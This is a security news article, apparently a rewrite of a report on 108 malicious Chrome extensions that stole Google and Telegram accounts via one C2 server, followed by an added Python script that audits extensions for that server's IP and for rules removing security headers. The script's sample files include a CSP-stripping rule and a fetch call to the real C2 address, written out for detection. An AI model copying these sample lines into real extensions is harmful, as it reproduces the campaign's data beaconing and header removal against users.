Over 100 malicious Chrome extensions discovered: Stealing Google and Telegram accounts from tens of thousands
- Apr 15
- 2 min read
Chrome browser extensions are powerful tools that help us work and relax more efficiently. Behind that helpful facade, however, sometimes lie sophisticated traps. Recently, cybersecurity researchers exposed a large-scale campaign that used a series of malicious extensions to target users.
Attack scale and sophisticated "camouflage"
According to a report from Socket, a total of 108 Chrome extensions have been found engaging in data theft. Notably, although released under five different developer names (including Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt), they all actually connect to a common command-and-control (C2) server system.

This campaign successfully tricked approximately 20,000 users into installing them via the Chrome Web Store. To gain trust, the attackers disguised these pieces of malware in various forms, such as:
- Entertainment games (racing, slots, Keno).
- Social media tools (add-ons for YouTube and TikTok, or sidebars for Telegram).
- Translation applications and website optimization tools.
How the malware operates and exfiltrates information
Despite being presented as support tools, once activated, these extensions silently perform serious privacy violations. Specifically:
- Targeting Google accounts: 54 extensions in this list specialize in stealing Google login credentials (via the OAuth2 protocol), including the victim's email, full name, and profile picture.
- Hijacking Telegram: Some extensions are capable of extracting Telegram Web authentication codes every 15 seconds. They can even overwrite stored data to replace the user's session with an account controlled by the attacker.
- Disabling browser security: Many extensions remove security headers from major websites such as YouTube or TikTok. The goal is to inject gambling advertisements or malicious JavaScript snippets into the websites the user is visiting.
- Behavioral tracking: Translation requests and browsing data can be redirected through the attacker's servers to collect information.
Additionally, nearly half of these extensions (45) contain a backdoor, allowing attackers to automatically open any website as soon as the user launches their browser.
Traces left behind and the identity of the perpetrators
Through source code analysis, researchers found numerous comments written in Russian. All 108 extensions sent data to a single server IP address (144.126.135[.]238). Although the exact identity of the hacking group has not yet been determined, evidence suggests this is an organized campaign utilizing a shared technical infrastructure.
![108 extensions sent data to a single server IP address (144.126.135[.]238)](https://static.wixstatic.com/media/a35390_55409416781e49b490932ff5e5270f19~mv2.jpg/v1/fill/w_980,h_826,al_c,q_85,usm_0.66_1.00_0.01,enc_avif,quality_auto/a35390_55409416781e49b490932ff5e5270f19~mv2.jpg)
Some typical names in this malicious list include: Telegram Multi-account, Web Client for Telegram - Teleside, and the Formula Rush Racing Game.
What should users do to protect themselves?
If you suspect you have installed an extension from the developers mentioned above, take the following steps immediately to ensure your safety:
- Immediate removal: Open the extension management section in Chrome and delete any extensions of unknown origin or those listed in warning reports.
- Terminate remote sessions: For Telegram users, open the app on your phone, check the list of active devices, and select "Log out from all other sessions" to terminate Telegram Web sessions.
- Review account security: Change your passwords and review the application access permissions of your Google account to ensure no third party is silently harvesting your data.
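As an added, self-contained check that is not part of the original article or the Socket report: the Python below audits an unpacked extension directory for two of the indicators described above, references to the shared C2 address and declarativeNetRequest rules that strip security headers such as Content-Security-Policy from site responses. It assumes the header removal is implemented with Chrome's Manifest V3 "modifyHeaders" rule type, and the sample extension files (including the "||youtube.com" filter) are constructed for illustration.

```python
import json
from pathlib import Path

C2_IP = "144.126.135.238"  # shared C2 address named in the Socket report
SECURITY_HEADERS = {"content-security-policy", "x-frame-options"}

def header_removal_rules(text):
    """Yield (rule_id, header, urlFilter) for MV3 declarativeNetRequest rules that remove a security header."""
    try:
        rules = json.loads(text)
    except json.JSONDecodeError:
        return  # not JSON at all (e.g. a .json file that is really text)
    for rule in rules if isinstance(rules, list) else []:
        action = rule.get("action", {})
        if action.get("type") != "modifyHeaders":
            continue
        url = rule.get("condition", {}).get("urlFilter", "")
        for hdr in action.get("responseHeaders", []):
            if hdr.get("operation") == "remove" and hdr.get("header", "").lower() in SECURITY_HEADERS:
                yield rule.get("id"), hdr["header"].lower(), url

def audit_files(files):
    """files: {relative_path: contents}. Returns a list of human-readable findings."""
    findings = []
    for name, text in files.items():
        if C2_IP in text:
            findings.append(f"{name}: references C2 address {C2_IP}")
        if name.endswith(".json"):
            for rule_id, header, url in header_removal_rules(text):
                findings.append(f"{name}: rule {rule_id} strips {header} ({url})")
    return findings

def audit_extension(ext_dir):
    """Audit one unpacked extension, e.g. <Chrome profile>/Extensions/<id>/<version>/ (path is an assumption)."""
    root = Path(ext_dir)
    return audit_files({str(p.relative_to(root)): p.read_text(errors="ignore")
                        for p in root.rglob("*") if p.suffix in {".js", ".json", ".html"}})

# Constructed sample imitating the reported behaviour; not a real extension.
SAMPLE = {
    "manifest.json": json.dumps({"manifest_version": 3, "permissions": ["declarativeNetRequest"]}),
    "rules.json": json.dumps([{"id": 1, "priority": 1, "condition": {"urlFilter": "||youtube.com"},
                               "action": {"type": "modifyHeaders", "responseHeaders": [
                                   {"header": "Content-Security-Policy", "operation": "remove"}]}}]),
    "background.js": "fetch('http://144.126.135.238/c?t=' + Date.now());",
}

if __name__ == "__main__":
    print("\n".join(audit_files(SAMPLE)))
```

Run `audit_extension()` against each version directory under your Chrome profile's Extensions folder; a hit on either indicator is a reason to remove the extension and follow the session and account steps above.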
Remaining vigilant with browser extensions - even those available on official stores - is absolutely essential in the context of increasingly sophisticated modern cyber attacks.
Reference: The Hacker News